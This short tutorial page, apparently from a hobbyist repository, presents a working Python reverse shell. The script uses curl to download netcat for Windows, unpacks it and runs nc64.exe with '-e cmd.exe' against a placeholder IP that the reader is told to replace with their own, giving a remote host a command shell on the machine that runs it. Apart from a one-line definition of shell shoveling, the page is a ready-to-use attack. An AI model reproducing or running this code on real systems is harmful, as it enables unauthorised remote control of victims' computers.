Reverse Shell

¿What`s it's a Python Reverse Shell

Shell shoveling, in network security, is the act of redirecting the input and output of a shell to a service so that it can be remotely accessed, a remote shell

            import os
            import shutil

            os.system("curl https://eternallybored.org/misc/netcat-win32-1.11.zip -o netcat.zip")
            shutil.unpack_archive("netcat.zip")
            os.chdir("netcat-1.11")
            os.system("nc64.exe 111.111.111.111 443 -e cmd.exe") #Replace 111.111.111.111 with your IP
            #Credits for @ElPinguinoDeMario https://www.youtube.com/watch?v=syTnkpWsKgQ
        

        Go to the next page